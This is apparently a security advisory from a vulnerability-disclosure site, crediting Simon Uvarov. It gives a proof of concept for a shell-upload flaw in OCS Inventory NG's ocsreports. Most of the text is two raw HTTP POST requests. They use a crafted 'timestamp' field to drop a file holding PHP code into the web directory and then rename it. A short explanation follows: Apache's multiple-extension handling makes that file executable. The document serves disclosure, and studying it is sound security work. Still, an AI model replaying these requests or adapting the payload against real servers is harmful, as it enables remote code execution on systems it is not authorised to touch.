OCS Inventory NG ocsreports Shell Upload

2018.11.14
Credit: Simon Uvarov
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

## Request 1 This request creates a temporary file containing PHP code in the /usr/share/ocsinventory-reports/ocsreports/a.php.a/ directory. POST /ocsreports/index.php?function=tele_package HTTP/1.1 Host: 192.168.5.135 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package Content-Type: multipart/form-data; boundary=---------------------------491299511942 Content-Length: 2836 Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------491299511942 Content-Disposition: form-data; name="CSRF_10" 8ab3df2f9a2078530027e74191af0b087429ad41 -----------------------------491299511942 Content-Disposition: form-data; name="document_root" /usr/share/ocsinventory-reports/ocsreports/ -----------------------------491299511942 Content-Disposition: form-data; name="timestamp" a.php.a -----------------------------491299511942 Content-Disposition: form-data; name="NAME" dshasdgasga -----------------------------491299511942 Content-Disposition: form-data; name="DESCRIPTION" asdgasdga -----------------------------491299511942 Content-Disposition: form-data; name="OS" WINDOWS -----------------------------491299511942 Content-Disposition: form-data; name="PROTOCOLE" HTTP -----------------------------491299511942 Content-Disposition: form-data; name="PRIORITY" 5 -----------------------------491299511942 Content-Disposition: form-data; name="teledeploy_file"; filename="exploit.zip" Content-Type: application/x-zip-compressed <?php phpinfo(); ?> -----------------------------491299511942 Content-Disposition: form-data; name="ACTION" EXECUTE -----------------------------491299511942 Content-Disposition: form-data; name="ACTION_INPUT" asdgasdgasdg -----------------------------491299511942 Content-Disposition: form-data; name="REDISTRIB_USE" 0 -----------------------------491299511942 Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT" d:\tele_ocs -----------------------------491299511942 Content-Disposition: form-data; name="REDISTRIB_PRIORITY" 5 -----------------------------491299511942 Content-Disposition: form-data; name="NOTIFY_USER" 0 -----------------------------491299511942 Content-Disposition: form-data; name="NOTIFY_TEXT" -----------------------------491299511942 Content-Disposition: form-data; name="NOTIFY_COUNTDOWN" -----------------------------491299511942 Content-Disposition: form-data; name="NOTIFY_CAN_ABORT" 0 -----------------------------491299511942 Content-Disposition: form-data; name="NOTIFY_CAN_DELAY" 0 -----------------------------491299511942 Content-Disposition: form-data; name="NEED_DONE_ACTION" 0 -----------------------------491299511942 Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT" -----------------------------491299511942 Content-Disposition: form-data; name="valid" Send -----------------------------491299511942 Content-Disposition: form-data; name="digest_algo" MD5 -----------------------------491299511942 Content-Disposition: form-data; name="digest_encod" Hexa -----------------------------491299511942 Content-Disposition: form-data; name="download_rep_creat" /var/www/html/download/server/ -----------------------------491299511942-- ## Request 2 This request renames the file to a.php.a-1 and also creates info file. POST /ocsreports/index.php?function=tele_package HTTP/1.1 Host: 192.168.5.135 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.5.135/ocsreports/index.php?function=tele_package Content-Type: multipart/form-data; boundary=---------------------------4827543632391 Content-Length: 3345 Cookie: VERS=7015; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; show_all_plugins_col=a%3A8%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%221%22%3Bi%3A2%3Bs%3A1%3A%222%22%3Bi%3A3%3Bs%3A1%3A%223%22%3Bi%3A4%3Bs%3A1%3A%224%22%3Bi%3A5%3Bs%3A1%3A%225%22%3Bi%3A6%3Bs%3A1%3A%226%22%3Bi%3A7%3Bs%3A1%3A%228%22%3B%7D; PHPSESSID=uvq1vomo3oi2q9mfolj9bvr6m0 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------4827543632391 Content-Disposition: form-data; name="CSRF_13" 53b6eab749060aa8cbe972e9c9a31ae148cf886b -----------------------------4827543632391 Content-Disposition: form-data; name="tailleFrag" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="nbfrags" 1 -----------------------------4827543632391 Content-Disposition: form-data; name="comment" asdgasdga -----------------------------4827543632391 Content-Disposition: form-data; name="digest" b14f8d3b56fb10f2257f53ab32947a50 -----------------------------4827543632391 Content-Disposition: form-data; name="VALID_END" END -----------------------------4827543632391 Content-Disposition: form-data; name="SIZE" 347 -----------------------------4827543632391 Content-Disposition: form-data; name="document_root" /usr/share/ocsinventory-reports/ocsreports/ -----------------------------4827543632391 Content-Disposition: form-data; name="timestamp" a.php.a -----------------------------4827543632391 Content-Disposition: form-data; name="NAME" dshasdgasga -----------------------------4827543632391 Content-Disposition: form-data; name="DESCRIPTION" -----------------------------4827543632391 Content-Disposition: form-data; name="OS" WINDOWS -----------------------------4827543632391 Content-Disposition: form-data; name="PROTOCOLE" HTTP -----------------------------4827543632391 Content-Disposition: form-data; name="PRIORITY" 5 -----------------------------4827543632391 Content-Disposition: form-data; name="teledeploy_file"; filename="" Content-Type: application/octet-stream -----------------------------4827543632391 Content-Disposition: form-data; name="ACTION" EXECUTE -----------------------------4827543632391 Content-Disposition: form-data; name="ACTION_INPUT" asdgasdgasdg -----------------------------4827543632391 Content-Disposition: form-data; name="REDISTRIB_USE" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="DOWNLOAD_SERVER_DOCROOT" d:\tele_ocs -----------------------------4827543632391 Content-Disposition: form-data; name="REDISTRIB_PRIORITY" 5 -----------------------------4827543632391 Content-Disposition: form-data; name="NOTIFY_USER" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="NOTIFY_TEXT" -----------------------------4827543632391 Content-Disposition: form-data; name="NOTIFY_COUNTDOWN" -----------------------------4827543632391 Content-Disposition: form-data; name="NOTIFY_CAN_ABORT" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="NOTIFY_CAN_DELAY" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="NEED_DONE_ACTION" 0 -----------------------------4827543632391 Content-Disposition: form-data; name="NEED_DONE_ACTION_TEXT" -----------------------------4827543632391 Content-Disposition: form-data; name="digest_algo" MD5 -----------------------------4827543632391 Content-Disposition: form-data; name="digest_encod" Hexa -----------------------------4827543632391 Content-Disposition: form-data; name="download_rep_creat" /var/www/html/download/server/ -----------------------------4827543632391-- # Apache Config The application has the following line in the /etc/apache2/conf-available/ocsinventory-reports.conf config file: AddType application/x-httpd-php .php Thus any file containing .php substring might be executed by an attacker. Thus the uploaded file is accessible via http://192.168.5.135/ocsreports/a.php.a/a.php.a-1 Reference: https://httpd.apache.org/docs/2.4/mod/mod_mime.html#multipleext Regards, Simon Uvarov


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top